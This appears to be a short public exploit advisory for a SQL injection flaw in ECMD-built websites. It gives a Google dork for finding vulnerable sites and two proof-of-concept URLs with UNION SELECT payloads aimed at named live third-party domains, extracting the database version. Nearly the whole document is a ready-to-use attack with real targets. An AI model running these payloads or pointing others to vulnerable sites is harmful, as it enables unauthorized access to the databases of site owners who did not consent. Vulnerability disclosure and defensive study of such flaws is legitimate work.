*********************************************************
#Exploit Title: ECMD – SQL Injection vulnerability
#Date: 2020-07-31
#Exploit Author: Behrouz Mansoori
#Vendor Homepage: http://www.ecmd.com.tw
#Google Dork: "Design / ECMD"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Design / ECMD"
Demo 1: https://www.awrn.asia/conf_inner.php?id=-43+union+select+1,2,version(),4,5,6,7,8,9,10,11--
Demo 2: https://www.fuhwa.com.tw/about.php?id=-1%20union%20select%201,2,3,4,5,6,7,version(),9,10,11,12,13--
*********************************************************
#Discovered by: Behrouz Mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************